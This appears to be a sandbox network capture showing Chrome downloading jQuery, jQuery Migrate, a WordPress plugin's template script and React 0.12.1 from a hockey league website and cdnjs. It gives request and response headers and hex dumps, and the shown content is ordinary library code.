                                                                                                                          2025-01-13 21:01:15 UTC838INData Raw: 28 66 75 6e 63 74 69 6f 6e 28 20 24 20 29 20 7b 0a 09 27 75 73 65 20 73 74 72 69 63 74 27 3b 0a 0a 09 2f 2a 2a 0a 09 20 2a 20 41 6c 6c 20 6f 66 20 74 68 65 20 63 6f 64 65 20 66 6f 72 20 79 6f 75 72 20 70 75 62 6c 69 63 2d 66 61 63 69 6e 67 20 4a 61 76 61 53 63 72 69 70 74 20 73 6f 75 72 63 65 0a 09 20 2a 20 73 68 6f 75 6c 64 20 72 65 73 69 64 65 20 69 6e 20 74 68 69 73 20 66 69 6c 65 2e 0a 09 20 2a 0a 09 20 2a 20 4e 6f 74 65 3a 20 49 74 20 68 61 73 20 62 65 65 6e 20 61 73 73 75 6d 65 64 20 79 6f 75 20 77 69 6c 6c 20 77 72 69 74 65 20 6a 51 75 65 72 79 20 63 6f 64 65 20 68 65 72 65 2c 20 73 6f 20 74 68 65 0a 09 20 2a 20 24 20 66 75 6e 63 74 69 6f 6e 20 72 65 66 65 72 65 6e 63 65 20 68 61 73 20 62 65 65 6e 20 70 72 65 70 61 72 65 64 20 66 6f 72 20 75 73 61
                                                                                                                          Data Ascii: (function( $ ) {'use strict';/** * All of the code for your public-facing JavaScript source * should reside in this file. * * Note: It has been assumed you will write jQuery code here, so the * $ function reference has been prepared for usa


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          28192.168.11.2049825137.117.65.2224431400C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2025-01-13 21:01:15 UTC434OUTGET /wp/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1 HTTP/1.1
                                                                                                                          Host: gthlcanada.com
                                                                                                                          Connection: keep-alive
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                          Accept: */*
                                                                                                                          Sec-Fetch-Site: none
                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          Cookie: _icl_current_language=en
                                                                                                                          2025-01-13 21:01:15 UTC521INHTTP/1.1 200 OK
                                                                                                                          Server: nginx
                                                                                                                          Date: Mon, 13 Jan 2025 21:01:15 GMT
                                                                                                                          Content-Type: application/javascript; charset=UTF-8
                                                                                                                          Content-Length: 10056
                                                                                                                          Connection: close
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Last-Modified: Sat, 11 Feb 2017 06:10:05 GMT
                                                                                                                          Expires: Tue, 14 Jan 2025 20:59:54 GMT
                                                                                                                          Cache-Control: max-age=86400, public
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          X-Varnish: 961677555 961970744
                                                                                                                          Age: 81
                                                                                                                          Via: 1.1 varnish-v4
                                                                                                                          ETag: W/"589eaabd-2748"
                                                                                                                          X-Cache: HIT
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                          2025-01-13 21:01:15 UTC10056INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 4d 69 67 72 61 74 65 20 76 31 2e 34 2e 31 20 7c 20 28 63 29 20 6a 51 75 65 72 79 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 22 75 6e 64 65 66 69 6e 65 64 22 3d 3d 74 79 70 65 6f 66 20 6a 51 75 65 72 79 2e 6d 69 67 72 61 74 65 4d 75 74 65 26 26 28 6a 51 75 65 72 79 2e 6d 69 67 72 61 74 65 4d 75 74 65 3d 21 30 29 2c 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 29 7b 66 75 6e 63 74 69 6f 6e 20 64 28 63 29 7b 76 61 72 20 64 3d 62 2e 63 6f 6e 73 6f 6c 65 3b 66 5b 63 5d 7c 7c 28 66 5b 63 5d 3d 21 30 2c 61 2e 6d 69 67 72 61 74 65 57 61 72 6e 69 6e 67 73 2e 70 75 73 68 28 63 29 2c 64 26 26 64 2e 77 61
                                                                                                                          Data Ascii: /*! jQuery Migrate v1.4.1 | (c) jQuery Foundation and other contributors | jquery.org/license */"undefined"==typeof jQuery.migrateMute&&(jQuery.migrateMute=!0),function(a,b,c){function d(c){var d=b.console;f[c]||(f[c]=!0,a.migrateWarnings.push(c),d&&d.wa


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          29192.168.11.2049823137.117.65.2224431400C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2025-01-13 21:01:15 UTC443OUTGET /app/plugins/latest_news/public/js/latest-news-public.js?ver=1.0.0 HTTP/1.1
                                                                                                                          Host: gthlcanada.com
                                                                                                                          Connection: keep-alive
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                          Accept: */*
                                                                                                                          Sec-Fetch-Site: none
                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          Cookie: _icl_current_language=en
                                                                                                                          2025-01-13 21:01:15 UTC518INHTTP/1.1 200 OK
                                                                                                                          Server: nginx
                                                                                                                          Date: Mon, 13 Jan 2025 21:01:15 GMT
                                                                                                                          Content-Type: application/javascript; charset=UTF-8
                                                                                                                          Content-Length: 838
                                                                                                                          Connection: close
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Last-Modified: Tue, 26 Jan 2021 19:12:32 GMT
                                                                                                                          Expires: Tue, 14 Jan 2025 20:59:54 GMT
                                                                                                                          Cache-Control: max-age=86400, public
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          X-Varnish: 961971118 961417546
                                                                                                                          Age: 81
                                                                                                                          Via: 1.1 varnish-v4
                                                                                                                          ETag: W/"601069a0-346"
                                                                                                                          X-Cache: HIT
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                          2025-01-13 21:01:15 UTC838INData Raw: 28 66 75 6e 63 74 69 6f 6e 28 20 24 20 29 20 7b 0a 09 27 75 73 65 20 73 74 72 69 63 74 27 3b 0a 0a 09 2f 2a 2a 0a 09 20 2a 20 41 6c 6c 20 6f 66 20 74 68 65 20 63 6f 64 65 20 66 6f 72 20 79 6f 75 72 20 70 75 62 6c 69 63 2d 66 61 63 69 6e 67 20 4a 61 76 61 53 63 72 69 70 74 20 73 6f 75 72 63 65 0a 09 20 2a 20 73 68 6f 75 6c 64 20 72 65 73 69 64 65 20 69 6e 20 74 68 69 73 20 66 69 6c 65 2e 0a 09 20 2a 0a 09 20 2a 20 4e 6f 74 65 3a 20 49 74 20 68 61 73 20 62 65 65 6e 20 61 73 73 75 6d 65 64 20 79 6f 75 20 77 69 6c 6c 20 77 72 69 74 65 20 6a 51 75 65 72 79 20 63 6f 64 65 20 68 65 72 65 2c 20 73 6f 20 74 68 65 0a 09 20 2a 20 24 20 66 75 6e 63 74 69 6f 6e 20 72 65 66 65 72 65 6e 63 65 20 68 61 73 20 62 65 65 6e 20 70 72 65 70 61 72 65 64 20 66 6f 72 20 75 73 61
                                                                                                                          Data Ascii: (function( $ ) {'use strict';/** * All of the code for your public-facing JavaScript source * should reside in this file. * * Note: It has been assumed you will write jQuery code here, so the * $ function reference has been prepared for usa


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          30192.168.11.2049826137.117.65.2224431400C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2025-01-13 21:01:15 UTC423OUTGET /wp/wp-includes/js/jquery/jquery.js?ver=1.12.4 HTTP/1.1
                                                                                                                          Host: gthlcanada.com
                                                                                                                          Connection: keep-alive
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                          Accept: */*
                                                                                                                          Sec-Fetch-Site: none
                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          Cookie: _icl_current_language=en
                                                                                                                          2025-01-13 21:01:15 UTC523INHTTP/1.1 200 OK
                                                                                                                          Server: nginx
                                                                                                                          Date: Mon, 13 Jan 2025 21:01:15 GMT
                                                                                                                          Content-Type: application/javascript; charset=UTF-8
                                                                                                                          Content-Length: 97184
                                                                                                                          Connection: close
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Last-Modified: Sat, 11 Feb 2017 06:10:05 GMT
                                                                                                                          Expires: Tue, 14 Jan 2025 20:59:19 GMT
                                                                                                                          Cache-Control: max-age=86400, public
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          X-Varnish: 961417822 961775443
                                                                                                                          Age: 116
                                                                                                                          Via: 1.1 varnish-v4
                                                                                                                          ETag: W/"589eaabd-17ba0"
                                                                                                                          X-Cache: HIT
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                          2025-01-13 21:01:15 UTC15861INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 31 2e 31 32 2e 34 20 7c 20 28 63 29 20 6a 51 75 65 72 79 20 46 6f 75 6e 64 61 74 69 6f 6e 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 61 2e 64 6f 63 75 6d 65 6e 74 3f 62 28 61 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 21 61 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 65 72 79 20 72 65 71 75 69 72 65 73 20 61 20 77 69 6e 64 6f 77 20 77 69 74 68 20 61 20 64 6f 63 75 6d 65
                                                                                                                          Data Ascii: /*! jQuery v1.12.4 | (c) jQuery Foundation | jquery.org/license */!function(a,b){"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a docume
                                                                                                                          2025-01-13 21:01:15 UTC16384INData Raw: 61 73 65 28 29 5d 7c 7c 66 61 2e 65 72 72 6f 72 28 22 75 6e 73 75 70 70 6f 72 74 65 64 20 70 73 65 75 64 6f 3a 20 22 2b 61 29 3b 72 65 74 75 72 6e 20 65 5b 75 5d 3f 65 28 62 29 3a 65 2e 6c 65 6e 67 74 68 3e 31 3f 28 63 3d 5b 61 2c 61 2c 22 22 2c 62 5d 2c 64 2e 73 65 74 46 69 6c 74 65 72 73 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 28 61 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 29 3f 68 61 28 66 75 6e 63 74 69 6f 6e 28 61 2c 63 29 7b 76 61 72 20 64 2c 66 3d 65 28 61 2c 62 29 2c 67 3d 66 2e 6c 65 6e 67 74 68 3b 77 68 69 6c 65 28 67 2d 2d 29 64 3d 4a 28 61 2c 66 5b 67 5d 29 2c 61 5b 64 5d 3d 21 28 63 5b 64 5d 3d 66 5b 67 5d 29 7d 29 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 65 28 61 2c 30 2c 63 29 7d 29 3a 65 7d 7d 2c 70 73 65 75 64 6f
                                                                                                                          Data Ascii: ase()]||fa.error("unsupported pseudo: "+a);return e[u]?e(b):e.length>1?(c=[a,a,"",b],d.setFilters.hasOwnProperty(a.toLowerCase())?ha(function(a,c){var d,f=e(a,b),g=f.length;while(g--)d=J(a,f[g]),a[d]=!(c[d]=f[g])}):function(a){return e(a,0,c)}):e}},pseudo
                                                                                                                          2025-01-13 21:01:15 UTC16384INData Raw: 6f 64 65 54 79 70 65 2c 6a 3d 69 3f 6e 2e 63 61 63 68 65 3a 61 2c 6b 3d 69 3f 61 5b 68 5d 3a 61 5b 68 5d 26 26 68 3b 69 66 28 6b 26 26 6a 5b 6b 5d 26 26 28 65 7c 7c 6a 5b 6b 5d 2e 64 61 74 61 29 7c 7c 76 6f 69 64 20 30 21 3d 3d 64 7c 7c 22 73 74 72 69 6e 67 22 21 3d 74 79 70 65 6f 66 20 62 29 72 65 74 75 72 6e 20 6b 7c 7c 28 6b 3d 69 3f 61 5b 68 5d 3d 63 2e 70 6f 70 28 29 7c 7c 6e 2e 67 75 69 64 2b 2b 3a 68 29 2c 6a 5b 6b 5d 7c 7c 28 6a 5b 6b 5d 3d 69 3f 7b 7d 3a 7b 74 6f 4a 53 4f 4e 3a 6e 2e 6e 6f 6f 70 7d 29 2c 22 6f 62 6a 65 63 74 22 21 3d 74 79 70 65 6f 66 20 62 26 26 22 66 75 6e 63 74 69 6f 6e 22 21 3d 74 79 70 65 6f 66 20 62 7c 7c 28 65 3f 6a 5b 6b 5d 3d 6e 2e 65 78 74 65 6e 64 28 6a 5b 6b 5d 2c 62 29 3a 6a 5b 6b 5d 2e 64 61 74 61 3d 6e 2e 65 78 74
                                                                                                                          Data Ascii: odeType,j=i?n.cache:a,k=i?a[h]:a[h]&&h;if(k&&j[k]&&(e||j[k].data)||void 0!==d||"string"!=typeof b)return k||(k=i?a[h]=c.pop()||n.guid++:h),j[k]||(j[k]=i?{}:{toJSON:n.noop}),"object"!=typeof b&&"function"!=typeof b||(e?j[k]=n.extend(j[k],b):j[k].data=n.ext
                                                                                                                          2025-01-13 21:01:15 UTC16384INData Raw: 63 69 61 6c 2e 73 75 62 6d 69 74 3d 7b 73 65 74 75 70 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6e 2e 6e 6f 64 65 4e 61 6d 65 28 74 68 69 73 2c 22 66 6f 72 6d 22 29 3f 21 31 3a 76 6f 69 64 20 6e 2e 65 76 65 6e 74 2e 61 64 64 28 74 68 69 73 2c 22 63 6c 69 63 6b 2e 5f 73 75 62 6d 69 74 20 6b 65 79 70 72 65 73 73 2e 5f 73 75 62 6d 69 74 22 2c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3d 61 2e 74 61 72 67 65 74 2c 63 3d 6e 2e 6e 6f 64 65 4e 61 6d 65 28 62 2c 22 69 6e 70 75 74 22 29 7c 7c 6e 2e 6e 6f 64 65 4e 61 6d 65 28 62 2c 22 62 75 74 74 6f 6e 22 29 3f 6e 2e 70 72 6f 70 28 62 2c 22 66 6f 72 6d 22 29 3a 76 6f 69 64 20 30 3b 63 26 26 21 6e 2e 5f 64 61 74 61 28 63 2c 22 73 75 62 6d 69 74 22 29 26 26 28 6e 2e 65 76 65 6e 74 2e 61 64 64
                                                                                                                          Data Ascii: cial.submit={setup:function(){return n.nodeName(this,"form")?!1:void n.event.add(this,"click._submit keypress._submit",function(a){var b=a.target,c=n.nodeName(b,"input")||n.nodeName(b,"button")?n.prop(b,"form"):void 0;c&&!n._data(c,"submit")&&(n.event.add
                                                                                                                          2025-01-13 21:01:15 UTC16384INData Raw: 3a 67 62 2c 69 6e 69 74 3a 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 2c 65 2c 66 29 7b 74 68 69 73 2e 65 6c 65 6d 3d 61 2c 74 68 69 73 2e 70 72 6f 70 3d 63 2c 74 68 69 73 2e 65 61 73 69 6e 67 3d 65 7c 7c 6e 2e 65 61 73 69 6e 67 2e 5f 64 65 66 61 75 6c 74 2c 74 68 69 73 2e 6f 70 74 69 6f 6e 73 3d 62 2c 74 68 69 73 2e 73 74 61 72 74 3d 74 68 69 73 2e 6e 6f 77 3d 74 68 69 73 2e 63 75 72 28 29 2c 74 68 69 73 2e 65 6e 64 3d 64 2c 74 68 69 73 2e 75 6e 69 74 3d 66 7c 7c 28 6e 2e 63 73 73 4e 75 6d 62 65 72 5b 63 5d 3f 22 22 3a 22 70 78 22 29 7d 2c 63 75 72 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 61 3d 67 62 2e 70 72 6f 70 48 6f 6f 6b 73 5b 74 68 69 73 2e 70 72 6f 70 5d 3b 72 65 74 75 72 6e 20 61 26 26 61 2e 67 65 74 3f 61 2e 67 65 74 28 74 68 69 73
                                                                                                                          Data Ascii: :gb,init:function(a,b,c,d,e,f){this.elem=a,this.prop=c,this.easing=e||n.easing._default,this.options=b,this.start=this.now=this.cur(),this.end=d,this.unit=f||(n.cssNumber[c]?"":"px")},cur:function(){var a=gb.propHooks[this.prop];return a&&a.get?a.get(this
                                                                                                                          2025-01-13 21:01:15 UTC15787INData Raw: 2c 4b 62 3d 2f 5e 28 3f 3a 61 62 6f 75 74 7c 61 70 70 7c 61 70 70 2d 73 74 6f 72 61 67 65 7c 2e 2b 2d 65 78 74 65 6e 73 69 6f 6e 7c 66 69 6c 65 7c 72 65 73 7c 77 69 64 67 65 74 29 3a 24 2f 2c 4c 62 3d 2f 5e 28 3f 3a 47 45 54 7c 48 45 41 44 29 24 2f 2c 4d 62 3d 2f 5e 5c 2f 5c 2f 2f 2c 4e 62 3d 2f 5e 28 5b 5c 77 2e 2b 2d 5d 2b 3a 29 28 3f 3a 5c 2f 5c 2f 28 3f 3a 5b 5e 5c 2f 3f 23 5d 2a 40 7c 29 28 5b 5e 5c 2f 3f 23 3a 5d 2a 29 28 3f 3a 3a 28 5c 64 2b 29 7c 29 7c 29 2f 2c 4f 62 3d 7b 7d 2c 50 62 3d 7b 7d 2c 51 62 3d 22 2a 2f 22 2e 63 6f 6e 63 61 74 28 22 2a 22 29 2c 52 62 3d 44 62 2e 68 72 65 66 2c 53 62 3d 4e 62 2e 65 78 65 63 28 52 62 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 29 7c 7c 5b 5d 3b 66 75 6e 63 74 69 6f 6e 20 54 62 28 61 29 7b 72 65 74 75 72 6e
                                                                                                                          Data Ascii: ,Kb=/^(?:about|app|app-storage|.+-extension|file|res|widget):$/,Lb=/^(?:GET|HEAD)$/,Mb=/^\/\//,Nb=/^([\w.+-]+:)(?:\/\/(?:[^\/?#]*@|)([^\/?#:]*)(?::(\d+)|)|)/,Ob={},Pb={},Qb="*/".concat("*"),Rb=Db.href,Sb=Nb.exec(Rb.toLowerCase())||[];function Tb(a){return


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          31192.168.11.2049827104.17.25.144431400C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2025-01-13 21:01:15 UTC568OUTGET /ajax/libs/react/0.12.1/react-with-addons.js HTTP/1.1
                                                                                                                          Host: cdnjs.cloudflare.com
                                                                                                                          Connection: keep-alive
                                                                                                                          sec-ch-ua: "Chromium";v="128", "Not;A=Brand";v="24", "Google Chrome";v="128"
                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                          Accept: */*
                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                          Referer: https://gthlcanada.com/
                                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          2025-01-13 21:01:15 UTC973INHTTP/1.1 200 OK
                                                                                                                          Date: Mon, 13 Jan 2025 21:01:15 GMT
                                                                                                                          Content-Type: application/javascript; charset=utf-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                          Cache-Control: public, max-age=30672000
                                                                                                                          ETag: W/"5eb03fbd-98818"
                                                                                                                          Last-Modified: Mon, 04 May 2020 16:15:57 GMT
                                                                                                                          cf-cdnjs-via: cfworker/kv
                                                                                                                          Cross-Origin-Resource-Policy: cross-origin
                                                                                                                          Timing-Allow-Origin: *
                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                          CF-Cache-Status: HIT
                                                                                                                          Age: 241434
                                                                                                                          Expires: Sat, 03 Jan 2026 21:01:15 GMT
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nC%2BhbSvi%2FnJwu2O%2FWE6gAMaqYs8ZVYdAUIOIm4JEAifEa5vCwZbRFiO%2Bzd9P0tf8cdJe3tiMdjRXJFQxm%2BjVS0AetskgjE%2FT%2F3MgchBN%2Bey%2F4nrh%2FUwVL0ZFqW3jpBKBcWqszqrW"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Strict-Transport-Security: max-age=15780000
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 9018520b790f0812-IAD
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          2025-01-13 21:01:15 UTC396INData Raw: 37 62 64 64 0d 0a 2f 2a 2a 0a 20 2a 20 52 65 61 63 74 20 28 77 69 74 68 20 61 64 64 6f 6e 73 29 20 76 30 2e 31 32 2e 31 0a 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 29 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 28 29 3b 65 6c 73 65 20 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 29 64 65 66 69 6e 65 28 5b 5d 2c 65 29 3b 65 6c 73 65 7b 76 61 72 20 66 3b 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 3f 66 3d 77 69 6e 64 6f 77 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70
                                                                                                                          Data Ascii: 7bdd/** * React (with addons) v0.12.1 */!function(e){if("object"==typeof exports&&"undefined"!=typeof module)module.exports=e();else if("function"==typeof define&&define.amd)define([],e);else{var f;"undefined"!=typeof window?f=window:"undefined"!=typ
                                                                                                                          2025-01-13 21:01:15 UTC1369INData Raw: 73 28 6f 2c 75 29 7b 69 66 28 21 6e 5b 6f 5d 29 7b 69 66 28 21 74 5b 6f 5d 29 7b 76 61 72 20 61 3d 74 79 70 65 6f 66 20 72 65 71 75 69 72 65 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 26 26 72 65 71 75 69 72 65 3b 69 66 28 21 75 26 26 61 29 72 65 74 75 72 6e 20 61 28 6f 2c 21 30 29 3b 69 66 28 69 29 72 65 74 75 72 6e 20 69 28 6f 2c 21 30 29 3b 76 61 72 20 66 3d 6e 65 77 20 45 72 72 6f 72 28 22 43 61 6e 6e 6f 74 20 66 69 6e 64 20 6d 6f 64 75 6c 65 20 27 22 2b 6f 2b 22 27 22 29 3b 74 68 72 6f 77 20 66 2e 63 6f 64 65 3d 22 4d 4f 44 55 4c 45 5f 4e 4f 54 5f 46 4f 55 4e 44 22 2c 66 7d 76 61 72 20 6c 3d 6e 5b 6f 5d 3d 7b 65 78 70 6f 72 74 73 3a 7b 7d 7d 3b 74 5b 6f 5d 5b 30 5d 2e 63 61 6c 6c 28 6c 2e 65 78 70 6f 72 74 73 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72
                                                                                                                          Data Ascii: s(o,u){if(!n[o]){if(!t[o]){var a=typeof require=="function"&&require;if(!u&&a)return a(o,!0);if(i)return i(o,!0);var f=new Error("Cannot find module '"+o+"'");throw f.code="MODULE_NOT_FOUND",f}var l=n[o]={exports:{}};t[o][0].call(l.exports,function(e){var
                                                                                                                          2025-01-13 21:01:15 UTC1369INData Raw: 28 22 2e 2f 52 65 61 63 74 54 72 61 6e 73 69 74 69 6f 6e 47 72 6f 75 70 22 29 3b 0a 76 61 72 20 52 65 61 63 74 55 70 64 61 74 65 73 20 3d 20 5f 64 65 72 65 71 5f 28 22 2e 2f 52 65 61 63 74 55 70 64 61 74 65 73 22 29 3b 0a 0a 76 61 72 20 63 78 20 3d 20 5f 64 65 72 65 71 5f 28 22 2e 2f 63 78 22 29 3b 0a 76 61 72 20 63 6c 6f 6e 65 57 69 74 68 50 72 6f 70 73 20 3d 20 5f 64 65 72 65 71 5f 28 22 2e 2f 63 6c 6f 6e 65 57 69 74 68 50 72 6f 70 73 22 29 3b 0a 76 61 72 20 75 70 64 61 74 65 20 3d 20 5f 64 65 72 65 71 5f 28 22 2e 2f 75 70 64 61 74 65 22 29 3b 0a 0a 52 65 61 63 74 2e 61 64 64 6f 6e 73 20 3d 20 7b 0a 20 20 43 53 53 54 72 61 6e 73 69 74 69 6f 6e 47 72 6f 75 70 3a 20 52 65 61 63 74 43 53 53 54 72 61 6e 73 69 74 69 6f 6e 47 72 6f 75 70 2c 0a 20 20 4c 69 6e
                                                                                                                          Data Ascii: ("./ReactTransitionGroup");var ReactUpdates = _dereq_("./ReactUpdates");var cx = _dereq_("./cx");var cloneWithProps = _dereq_("./cloneWithProps");var update = _dereq_("./update");React.addons = { CSSTransitionGroup: ReactCSSTransitionGroup, Lin
                                                                                                                          2025-01-13 21:01:15 UTC1369INData Raw: 5f 64 65 72 65 71 5f 28 22 2e 2f 66 6f 63 75 73 4e 6f 64 65 22 29 3b 0a 0a 76 61 72 20 41 75 74 6f 46 6f 63 75 73 4d 69 78 69 6e 20 3d 20 7b 0a 20 20 63 6f 6d 70 6f 6e 65 6e 74 44 69 64 4d 6f 75 6e 74 3a 20 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0a 20 20 20 20 69 66 20 28 74 68 69 73 2e 70 72 6f 70 73 2e 61 75 74 6f 46 6f 63 75 73 29 20 7b 0a 20 20 20 20 20 20 66 6f 63 75 73 4e 6f 64 65 28 74 68 69 73 2e 67 65 74 44 4f 4d 4e 6f 64 65 28 29 29 3b 0a 20 20 20 20 7d 0a 20 20 7d 0a 7d 3b 0a 0a 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 20 3d 20 41 75 74 6f 46 6f 63 75 73 4d 69 78 69 6e 3b 0a 0a 7d 2c 7b 22 2e 2f 66 6f 63 75 73 4e 6f 64 65 22 3a 31 32 35 7d 5d 2c 33 3a 5b 66 75 6e 63 74 69 6f 6e 28 5f 64 65 72 65 71 5f 2c 6d 6f 64 75 6c 65 2c 65 78 70 6f 72 74 73
                                                                                                                          Data Ascii: _dereq_("./focusNode");var AutoFocusMixin = { componentDidMount: function() { if (this.props.autoFocus) { focusNode(this.getDOMNode()); } }};module.exports = AutoFocusMixin;},{"./focusNode":125}],3:[function(_dereq_,module,exports
                                                                                                                          2025-01-13 21:01:15 UTC1369INData Raw: 32 3b 0a 76 61 72 20 53 50 41 43 45 42 41 52 5f 43 48 41 52 20 3d 20 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 53 50 41 43 45 42 41 52 5f 43 4f 44 45 29 3b 0a 0a 76 61 72 20 74 6f 70 4c 65 76 65 6c 54 79 70 65 73 20 3d 20 45 76 65 6e 74 43 6f 6e 73 74 61 6e 74 73 2e 74 6f 70 4c 65 76 65 6c 54 79 70 65 73 3b 0a 0a 2f 2f 20 45 76 65 6e 74 73 20 61 6e 64 20 74 68 65 69 72 20 63 6f 72 72 65 73 70 6f 6e 64 69 6e 67 20 70 72 6f 70 65 72 74 79 20 6e 61 6d 65 73 2e 0a 76 61 72 20 65 76 65 6e 74 54 79 70 65 73 20 3d 20 7b 0a 20 20 62 65 66 6f 72 65 49 6e 70 75 74 3a 20 7b 0a 20 20 20 20 70 68 61 73 65 64 52 65 67 69 73 74 72 61 74 69 6f 6e 4e 61 6d 65 73 3a 20 7b 0a 20 20 20 20 20 20 62 75 62 62 6c 65 64 3a 20 6b 65 79 4f 66 28 7b 6f 6e 42 65 66
                                                                                                                          Data Ascii: 2;var SPACEBAR_CHAR = String.fromCharCode(SPACEBAR_CODE);var topLevelTypes = EventConstants.topLevelTypes;// Events and their corresponding property names.var eventTypes = { beforeInput: { phasedRegistrationNames: { bubbled: keyOf({onBef
